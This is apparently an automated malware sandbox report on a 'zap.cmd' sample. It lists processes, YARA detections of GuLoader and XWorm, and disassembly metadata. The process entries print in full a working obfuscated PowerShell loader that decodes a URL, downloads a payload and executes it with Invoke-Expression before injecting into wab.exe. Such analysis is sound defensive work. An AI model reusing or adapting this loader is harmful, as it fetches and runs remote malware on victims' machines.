                                                                                    2024-05-23 19:12:56 UTC4600INData Raw: 2e c3 eb 8e 3a 60 8f 8f a8 bd 3d 60 21 40 c5 6c 4f 2f 5a 52 09 73 fe e2 f5 c1 9d c4 6b 60 3c a7 6e d6 b0 3f f5 86 43 a8 df ce 81 69 19 06 32 1a 73 f8 2b 71 26 d2 86 53 fa ba bf 28 70 26 48 17 06 87 01 9f 17 16 66 71 8d 9a a5 21 d8 e5 15 18 8b 34 dd d2 24 a6 88 2a 03 e1 a4 4e 55 1e 6f 96 62 3a f8 1c dd e1 2b 86 9a 8c 96 17 ec bf c9 48 39 bb fb 24 f4 0d b5 4b c6 73 96 1b ed f1 8d c8 d6 e3 f9 a3 c8 26 10 59 6d ff 2a 0d ff a8 60 f2 96 83 26 6a 33 24 04 3f 3c 23 71 ca d8 c6 8d 3a 7f 03 c0 06 3f 85 8f 9f 4a b0 0f 94 b3 51 d9 38 57 c5 54 68 0a 05 f5 ff 74 2d d4 40 dd fc 79 8e 4c a7 a4 26 2c d0 3c 35 c8 1d c7 b3 41 46 a0 27 ce 29 50 ac 2a 71 8a fa 3f 41 fe 0a f4 54 ee 23 45 0c 98 47 8b 1d de 67 7b 03 a1 84 5b 44 a5 67 6a e1 a5 25 13 0a a7 de 86 a9 0b 7f f0 5b ce
                                                                                    Data Ascii: .:`=`!@lO/ZRsk`<n?Ci2s+q&S(p&Hfq!4$*NUob:+H9$Ks&Ym*`&j3$?<#q:?JQ8WTht-@yL&,<5AF')P*q?AT#EGg{[Dgj%[


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:15:12:05
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
                                                                                    Imagebase:0x7ff626eb0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:15:12:05
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66e660000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:15:12:05
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg ,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers (hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r ');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0 har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr ,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers (hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$ UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;"
                                                                                    Imagebase:0x7ff6e3d50000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:15:12:05
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66e660000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:15:12:12
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
                                                                                    Imagebase:0x7ff626eb0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:15:12:19
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg ,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers (hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r ');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0 har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr ,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers (hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$ UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;"
                                                                                    Imagebase:0x1e0000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2615577920.0000000008440000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2609130468.000000000573F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2616022619.000000000A044000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:15:12:22
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
                                                                                    Imagebase:0x1c0000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:12
                                                                                    Start time:15:12:45
                                                                                    Start date:23/05/2024
                                                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                    Imagebase:0x120000
                                                                                    File size:516'608 bytes
                                                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.3357542132.0000000005144000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Executed Functions

                                                                                      Function 00007FFD3466AB16 Relevance: .5, Instructions: 474COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2853991306.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ffd34660000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf476fd2a9db139b86f81cc1817e8b76376f781f80f0ae87ca14576499a9d9b2
                                                                                      • Instruction ID: 62d90deed8d3c4a8de4fe2841452003f7f96485085b1f8c4ec9a7bfb68e9d766
                                                                                      • Opcode Fuzzy Hash: cf476fd2a9db139b86f81cc1817e8b76376f781f80f0ae87ca14576499a9d9b2
                                                                                      • Instruction Fuzzy Hash: F7F1A670A08A8D8FEBA9DF28CC957E977E1FF55310F04426EE84DC7291DB7899418B81
                                                                                      Function 00007FFD3466B8C2 Relevance: .5, Instructions: 463COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2853991306.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ffd34660000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f2febb733740660597e61c44267ff5ceac2bd78385f9ff37a638bcfec85d3e12
                                                                                      • Instruction ID: 81a55e6c5ae59c3497b6dfa452e03874e9d9e149a4377107c76b78e24b3afd9c
                                                                                      • Opcode Fuzzy Hash: f2febb733740660597e61c44267ff5ceac2bd78385f9ff37a638bcfec85d3e12
                                                                                      • Instruction Fuzzy Hash: 3BE1B670A08A4D8FEBA8DF28C8A57E977E1FF55310F04426ED84DC7295DF78A9418B81
                                                                                      Function 00007FFD34734149 Relevance: .7, Instructions: 651COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2855034136.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ffd34730000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e539844f7dca6bc4c12ca5bbf8420102eae0aec2880c4e88cd37473123745e54
                                                                                      • Instruction ID: 1eac163047e737bae305162b4dcbbdd3020f8b7b95c3c6ff4d37dc567f6f4217
                                                                                      • Opcode Fuzzy Hash: e539844f7dca6bc4c12ca5bbf8420102eae0aec2880c4e88cd37473123745e54
                                                                                      • Instruction Fuzzy Hash: E11209A2A0EAC98FE75A9B6848B51B47FE0EF57214B2801FED189D71D3D91CE805D3C1
                                                                                      Function 00007FFD3473538B Relevance: .3, Instructions: 326COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2855034136.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ffd34730000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 81ddeeacf6d4bd6809c54f7f4b6b15e03d6501b4a70e29213b7d83fa45f48bf2
                                                                                      • Instruction ID: 5d84e94bda3fe8e05b98d16bd2d22e1d1ba23f1d8a8de5312a8ada4232bbf0d5
                                                                                      • Opcode Fuzzy Hash: 81ddeeacf6d4bd6809c54f7f4b6b15e03d6501b4a70e29213b7d83fa45f48bf2
                                                                                      • Instruction Fuzzy Hash: B0A156B2B0DA898FEBE6DA6C54B55B877D2EF56350B6801BED14DC7292DD18BC0083C1
                                                                                      Function 00007FFD3466C020 Relevance: .3, Instructions: 273COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2853991306.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ffd34660000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3dc755c4807669910e28654df09308cc14b2eb37c99e56be2530921f9a90ee09
                                                                                      • Instruction ID: 53348f568c8afb1210e1faadc847264f9de1cdeda328d1127ec41948cfeff741
                                                                                      • Opcode Fuzzy Hash: 3dc755c4807669910e28654df09308cc14b2eb37c99e56be2530921f9a90ee09
                                                                                      • Instruction Fuzzy Hash: CC81143071CE494FE798EE1CC4A5AB5B7E1EF99320B10057DD18AC32A6DA29F846CB40
                                                                                      Function 00007FFD347342E7 Relevance: .2, Instructions: 150COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
